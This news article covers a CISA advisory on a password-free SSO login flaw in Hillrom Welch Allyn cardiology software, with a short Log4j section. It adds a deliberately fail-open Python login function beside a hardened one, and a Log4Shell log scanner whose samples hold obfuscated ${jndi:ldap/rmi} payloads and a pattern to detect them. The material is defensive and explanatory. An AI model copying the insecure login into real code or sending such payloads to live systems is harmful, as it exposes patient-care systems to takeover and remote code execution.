CISA Warns of Authentication Vulnerabilities in Cardiology Products
Successful exploitation of authentication vulnerabilities in certain Hillrom Welch Allyn cardiology products may allow cybercriminals to access privileged accounts, CISA warned.
The Cybersecurity and Infrastructure Security Agency (CISA) released a medical advisory warning healthcare organizations of authentication vulnerabilities associated with certain Hillrom Welch Allyn cardiology products. If successfully exploited, threat actors may be able to access privileged accounts.
Hillrom reported the vulnerabilities to CISA and plans to address them in its next software release, the advisory explained.
The following cardiology products are impacted when configured to use single sign-on (SSO):
- Welch Allyn Q-Stress Cardiac Stress Testing System: Versions 6.0.0 through 6.3.1
- Welch Allyn X-Scribe Cardiac Stress Testing System: Versions 5.01 through 6.3.1
- Welch Allyn Diagnostic Cardiology Suite: Version 2.1.0
- Welch Allyn Vision Express: Versions 6.1.0 through 6.4.0
- Welch Allyn H-Scribe Holter Analysis System: Versions 5.01 through 6.4.0
- Welch Allyn R-Scribe Resting ECG System: Versions 5.01 through 7.0.0
- Welch Allyn Connex Cardio: Versions 1.0.0 through 1.1.1
When SSO is enabled, the application accepts manual entry of any Active Directory (AD) account name that has been provisioned in the application without requiring a password. A threat actor who knows or guesses a provisioned account name can therefore log in as that account with all of its privileges.
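The pattern the advisory describes is a fail-open SSO path: the application takes the account name from user input and, because SSO is on, never asks for a credential. The following is an added, hypothetical reconstruction written for this article to show that pattern beside a hardened form; it is not Hillrom or Welch Allyn code, and the account table, role names, `verify_password` stand-in and the `os_identity` parameter are all assumptions.

```python
"""Fail-open SSO login (as described in the advisory) beside a hardened form.

Added example for this page, not vendor code. Accounts, roles, the password
check and the `os_identity` source are constructed for the illustration.
"""
from dataclasses import dataclass
from typing import Optional

# Constructed sample of AD accounts "provisioned in the application".
PROVISIONED_ACCOUNTS = {
    "CLINIC\\tech01": {"role": "Technician"},
    "CLINIC\\svc_admin": {"role": "Administrator"},
}


@dataclass
class Session:
    account: str
    role: str


def verify_password(account: str, password: Optional[str]) -> bool:
    """Stand-in for a real credential check (LDAP bind, Kerberos, ...).
    Constructed for the example: exactly one account/password pair is valid."""
    return account == "CLINIC\\tech01" and password == "correct horse"


def login_vulnerable(typed_account: str, password: Optional[str],
                     sso_enabled: bool) -> Optional[Session]:
    """The weak pattern: with SSO on, any provisioned account name the user
    types is trusted outright and no password is ever checked."""
    acct = PROVISIONED_ACCOUNTS.get(typed_account)
    if acct is None:
        return None
    if sso_enabled:
        return Session(typed_account, acct["role"])   # no credential check
    if not verify_password(typed_account, password):
        return None
    return Session(typed_account, acct["role"])


def login_hardened(typed_account: Optional[str], password: Optional[str],
                   sso_enabled: bool, os_identity: Optional[str]) -> Optional[Session]:
    """Hardened form: under SSO the identity must come from the already
    authenticated OS/domain logon session (`os_identity`, assumed to be
    supplied by the platform, never typed by the user). Manual entry always
    requires a verified password, whatever the SSO setting."""
    if sso_enabled and os_identity is not None:
        acct = PROVISIONED_ACCOUNTS.get(os_identity)
        return Session(os_identity, acct["role"]) if acct else None
    if typed_account is None or not verify_password(typed_account, password):
        return None
    acct = PROVISIONED_ACCOUNTS.get(typed_account)
    return Session(typed_account, acct["role"]) if acct else None


if __name__ == "__main__":
    # Typing the admin account name with no password succeeds on the weak path...
    print(login_vulnerable("CLINIC\\svc_admin", None, sso_enabled=True))
    # ...and is refused on the hardened path unless the OS session vouches for it.
    print(login_hardened("CLINIC\\svc_admin", None, True, os_identity=None))
    print(login_hardened(None, None, True, os_identity="CLINIC\\svc_admin"))
```

The distinguishing check is where the identity comes from: in the hardened form a name typed into the login dialog never becomes a session on its own, so disabling SSO (the interim mitigation) and the eventual fix both amount to closing the branch that trusts user-supplied text.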
Until Hillrom releases software updates, it recommends that organizations using its cardiology products disable the SSO feature in the Modality Manager Configuration settings. Users should also upgrade to the latest product versions as soon as the new software updates are released.
In addition, Hillrom recommended that device users apply authentication controls for server access and apply adequate network and physical security controls.
CISA urged users to minimize network exposure and ensure that the devices are not accessible from the internet. Additionally, CISA suggested that users locate control system networks and remote devices behind firewalls.
“Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents,” the advisory continued.
“No known public exploits specifically target this vulnerability. This vulnerability has a high attack complexity.”
CISA also recently released an advisory and accompanying website for newly discovered, extremely severe Apache Log4j vulnerabilities. Threat actors could exploit the flaw to execute arbitrary code on a vulnerable system or device. Researchers first discovered the remote code execution (RCE) vulnerability in November. However, proof-of-concept exploit code has been circulating on social media recently, making the vulnerability a higher priority.
US cybersecurity officials have only observed low-impact attacks from the vulnerabilities so far as of December 15, Reuters reported. Most of the attacks have consisted of threat actors seeking to exploit computing power to mine cryptocurrency.
However, the threat is still evolving, and it is likely that it will continue to pose a risk to a variety of sectors. A patch has been available since December 6, but it can be difficult to ensure that every organization using the extremely common Java logging library has successfully patched their systems.
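Because patching every Log4j instance takes time, most organizations also want to see whether exploitation attempts are already hitting their systems. The following is an added example for this page, not code from the article or from Apache: a scanner that normalizes captured log or request lines and flags the `${jndi:...}` lookup string that publicly documented exploits rely on. The lookup trigger and the `${lower:...}`, `${upper:...}`, `${::-x}` and URL-encoding obfuscations are taken from public analyses of the flaw, not from this article; the log lines are constructed for the demonstration.

```python
"""Flag Log4j lookup-injection probes in log lines.

Added example, not from the article or Apache. The ${jndi:...} trigger and
the obfuscation forms handled here come from public write-ups of the flaw;
all sample lines below are constructed.
"""
import re
from urllib.parse import unquote

# An innermost ${...} expression: no nested "${" or "}" inside the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve_inner(expr: str) -> str:
    """Collapse one innermost lookup the way an attacker relies on Log4j to:
    ${lower:X} -> x, ${upper:X} -> X, ${anything:-default} -> default.
    A jndi lookup or an unknown lookup is left intact."""
    low = expr.lower()
    if low.startswith("jndi:"):
        return "${" + expr + "}"
    if ":-" in expr:                      # default-value syntax, e.g. ${::-j}
        return expr.split(":-", 1)[1]
    if low.startswith("lower:"):
        return expr[6:].lower()
    if low.startswith("upper:"):
        return expr[6:].upper()
    return "${" + expr + "}"


def normalize(line: str, max_rounds: int = 20) -> str:
    """URL-decode, then repeatedly resolve innermost lookups until nothing
    changes (or the round limit is hit, to stop pathological input)."""
    text = unquote(line)
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve_inner(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    """True when the normalized line still carries a jndi lookup."""
    return "${jndi:" in normalize(line).lower()


def scan(lines):
    """Return the indexes of lines that look like exploitation attempts."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed sample lines (198.51.100.0/24 is a documentation range).
SAMPLE_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7/x}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/y}"',
    '10.0.0.9 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fz%7D HTTP/1.1" 404 "-"',
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${date:yyyy}"',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LINES):
        print(i, normalize(SAMPLE_LINES[i]))
```

A match on a log line shows that a probe was sent, not that it succeeded; the lookup only fires on an unpatched Log4j that actually logs the attacker-controlled field, so a hit should drive an inventory check of which application wrote that line and what Log4j version it ships.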
“The exact extent to which Log4j is deployed throughout the health sector is unknown. It is a common application, utilized by many enterprises and cloud applications including several large and well-known vendors,” the Health Sector Cybersecurity Coordination Center (HC3) stated in its sector alert.
“Therefore, it’s highly likely that the health sector is impacted by this vulnerability, and possibly to a large-scale extent. Log4j is known to be a component in many software platforms, some of which are part of cloud services.”